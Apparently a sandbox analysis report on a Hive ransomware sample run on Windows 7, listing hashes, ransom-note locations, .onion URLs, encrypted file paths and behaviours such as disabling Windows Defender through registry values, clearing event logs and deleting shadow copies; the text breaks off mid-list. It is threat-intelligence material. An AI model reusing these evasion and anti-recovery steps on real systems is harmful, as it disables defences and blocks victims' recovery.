Analysis
-
max time kernel
549s -
max time network
433s -
platform
windows7_x64 -
resource
win7-20230220-es -
resource tags
arch:x64arch:x86image:win7-20230220-eslocale:es-esos:windows7-x64systemwindows -
submitted
05-03-2023 16:36
Behavioral task
behavioral1
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win7-20230220-es
General
-
Target
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
-
Size
884KB
-
MD5
da13022097518d123a91a3958be326da
-
SHA1
24a71ab462594d5a159bbf176588af951aba1381
-
SHA256
25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5
-
SHA512
a82aa97a92cd21ee2d4b556448fd3293396eb7c01d3626ebdb6c3816277783578686830c430014b6b2fc3280bc1301df27da079937f88834c2d35641eb5fc26f
-
SSDEEP
12288:Sw41dVZvThPCsM18GLHe7wlDdkPAQEtxr0fflvRmhEBWtdUJiAUtP/T/kAfMvgVt:dod1HDmlDdkZ4YXPpaTTXMw
Malware Config
Extracted
C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\EGdu_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 1064 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 776 wevtutil.exe 856 wevtutil.exe 1964 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Deletes itself 1 IoCs
pid Process 2164 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/936-54-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-55-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-57-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-58-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-59-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-60-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-62-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-81-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-1065-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-2563-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-2845-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-3971-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-6919-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8089-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8090-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8091-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8094-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8096-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8097-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8099-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8101-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8103-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8104-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8106-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8107-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8108-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8110-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8111-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8113-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8114-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8115-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8117-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8119-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8121-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8123-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8124-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8126-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8128-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8130-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8132-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8133-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8135-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8137-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8138-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8139-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8141-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8142-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8143-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8144-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8146-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8147-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8148-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8149-0x00000000001D0000-0x00000000004E2000-memory.dmp upx behavioral1/memory/936-8172-0x00000000001D0000-0x00000000004E2000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\PACBELL.NET.XML.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcFEqlOW3l2vQwXiSeJkGhRK.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\gadget.xml windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN01084_.WMF.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcFKvLly9E3GIZeRmac9bawi.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcG5WkQLcstjV5d8aGhA9oFX.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00941_.WMF.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcEk_uyxMbJJLCWZzG5HuaBg.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02022_.WMF.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcHtZovF_ylzH_JlAkMiHUdx.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR49B.GIF.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcH17ROjMU2GGhswOfKhZ3h5.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsPreviewTemplate.html.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcGcMHy16TrODOtCANZ54Bt7.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files (x86)\Common Files\Adobe\Updater6\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_RGB6_PAL.wmv windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcE0NBiblPI_BL8Edda7ajQU.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Noronha.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcG-3UxUwh5_f-tRbZ4fz2RZ.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcHRV0DBFYKdBcCC8ooUdTob.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Mozilla Firefox\precomplete.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcFEE0lHZtL1JPjft_hMow0f.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcFptCUgmT9AFfjF626ITiRX.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_s.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcE6pM9oRgXPNdnHl6RhjHlu.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_zh_4.4.0.v20140623020002.jar.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcETHmRL2CB7AymMGsMJcuRS.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcFt1YXqY27AAhFg7m-mU8oV.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Training.potx.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcE9qQHjpy5mZtIn0rII2SsJ.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcFFSoXQoYYdRAQhw34m-upu.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files\Microsoft Games\Chess\fr-FR\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcEUAx8Okh_oRPKVDdbdKmUo.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcHTMyOxDNETGA7LJk1W5r44.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Common Files\System\ado\adojavas.inc windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcHVwchpXt14QnKLe3SJwHA9.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\css\settings.css windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00444_.WMF.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcHFiU3mJanoBJU_FlPFTGQq.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18249_.WMF.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcFMpO0milJcGIlRu1I38rgL.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUB6INTL.DLL.IDX_DLL.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcElVdMYHP2UZSZu9T4coeIO.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Common Files\System\msadc\it-IT\msadcor.dll.mui windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcGPB_c91a8ybv9sl60KMYgN.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcGuP5bn4LBsNixJj3V6VOp8.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\EPSIMP32.FLT.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcH1DYX6SgnwLGK-H4DWg1Yl.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN092.XML.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcGXXButJzhJPLRVwLKIUdwV.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcGorE-J4o07SjULxjK1Qg5v.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143754.GIF.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcFqkegqAQrFAUmZIJBPApAy.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Paper.thmx.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcHBj4ot_gB2YJ2wkuvXwYsS.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files\Microsoft Games\More Games\de-DE\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_SelectionSubpicture.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\1033\MCABOUT.HTM.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcGgMFktFxeOCx6SAOmFrvZs.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\bdcmetadata.xsd.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcFa3CeRNtTCciiw_HV1MpkO.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENV98.POC.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcHlNeVqioe5H9Hou9FCGM8l.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcEKk4rvdwhuHz_chDduXLxK.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcFbrACRTj4mPr2g3Dj9ZTVV.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_m.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Flyout_Thumbnail_Shadow.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\ja-JP\TipBand.dll.mui windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR25F.GIF.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcGLWdD32eiHWOvHc8ILWiBH.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\UTILITY.ACCDA.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcFgRSwqsOEiS8AOjGWf6C8x.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\POSTCARD.DPV.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcEns40qXMIXFK_kU6ITn1JD.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcHnZwRVvhccBsZxY3vRL3pI.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Waitcursor.gif windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200273.WMF.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcFg22Xqog-HBCfKa_8os0pC.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcFfUSWRjGREYY5W6uY_l-EC.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00286_.WMF.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcHMP2fnBRoAXA0G72IQVflQ.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_F_COL.HXK.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcEsx4j0emNLMX7DK0BMWjNt.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Wordcnvpxy.cnv.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcHXFFbGROUnC9N2YSuXdlg0.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+6.4bsqgJhgj4shkV35i-ibPY65b47y40BE0BZwaTLzAcEnD7Bq77KgeMxTCiZ6b_5L.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1460 sc.exe 1956 sc.exe 1644 sc.exe 1724 sc.exe 904 sc.exe 2016 sc.exe 1624 sc.exe 1000 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1112 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1996 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2148 PING.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2132 powershell.exe 936 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1964 wevtutil.exe Token: SeBackupPrivilege 1964 wevtutil.exe Token: SeSecurityPrivilege 776 wevtutil.exe Token: SeBackupPrivilege 776 wevtutil.exe Token: SeSecurityPrivilege 856 wevtutil.exe Token: SeBackupPrivilege 856 wevtutil.exe Token: SeIncreaseQuotaPrivilege 988 wmic.exe Token: SeSecurityPrivilege 988 wmic.exe Token: SeTakeOwnershipPrivilege 988 wmic.exe Token: SeLoadDriverPrivilege 988 wmic.exe Token: SeSystemProfilePrivilege 988 wmic.exe Token: SeSystemtimePrivilege 988 wmic.exe Token: SeProfSingleProcessPrivilege 988 wmic.exe Token: SeIncBasePriorityPrivilege 988 wmic.exe Token: SeCreatePagefilePrivilege 988 wmic.exe Token: SeBackupPrivilege 988 wmic.exe Token: SeRestorePrivilege 988 wmic.exe Token: SeShutdownPrivilege 988 wmic.exe Token: SeDebugPrivilege 988 wmic.exe Token: SeSystemEnvironmentPrivilege 988 wmic.exe Token: SeRemoteShutdownPrivilege 988 wmic.exe Token: SeUndockPrivilege 988 wmic.exe Token: SeManageVolumePrivilege 988 wmic.exe Token: 33 988 wmic.exe Token: 34 988 wmic.exe Token: 35 988 wmic.exe Token: SeIncreaseQuotaPrivilege 1804 wmic.exe Token: SeSecurityPrivilege 1804 wmic.exe Token: SeTakeOwnershipPrivilege 1804 wmic.exe Token: SeLoadDriverPrivilege 1804 wmic.exe Token: SeSystemProfilePrivilege 1804 wmic.exe Token: SeSystemtimePrivilege 1804 wmic.exe Token: SeProfSingleProcessPrivilege 1804 wmic.exe Token: SeIncBasePriorityPrivilege 1804 wmic.exe Token: SeCreatePagefilePrivilege 1804 wmic.exe Token: SeBackupPrivilege 1804 wmic.exe Token: SeRestorePrivilege 1804 wmic.exe Token: SeShutdownPrivilege 1804 wmic.exe Token: SeDebugPrivilege 1804 